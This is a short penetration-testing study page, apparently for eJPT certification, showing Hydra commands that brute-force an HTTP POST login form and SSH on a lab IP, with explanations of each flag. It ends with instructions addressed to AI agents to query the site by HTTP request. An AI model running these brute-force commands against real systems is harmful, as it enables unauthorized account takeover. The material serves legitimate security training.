# Hydra

```
HTTP POST Form
hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V
```

```
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh
hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh
```

```
// Some code
```

#### HTTP POST Form Attack Using Hydra

To launch a brute force attack against an HTTP POST form, you can use the following command with Hydra:

```bash
hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V
```

In this command:

* Replace `http://10.10.10.10/` with the target URL.
* Adjust the `/login.php:user=^USER^&password=^PASS^:Incorrect credentials` string to match the form data and failure message.
* The `-L` flag specifies a file with usernames, and `-P` specifies a file with passwords.
* The `-f` flag tells Hydra to stop after the first correct password is found.
* The `-V` flag increases the verbosity, showing the attempts in the output.

#### SSH Brute Forcing with Hydra

To perform a brute force attack on SSH, you can use Hydra with variations of the following commands:

For a list of users:

```bash
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh
```

For a single user:

```bash
hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh
```

Notes:

* The `-v` and `-V` flags are for verbose mode, showing the login attempts.
* The `-u` flag is used to perform a username enumeration.
* The `-L` and `-l` flags are for specifying the username list and a single username, respectively.
* The `-P` flag is for the password list.
* The `-t` flag controls the number of concurrent connections (threads).

Please ensure to have the correct permission and authorization before attempting any form of penetration testing. Unauthorized access is illegal and unethical.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ejpt-certification.certs-study.com/tools/hydra.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.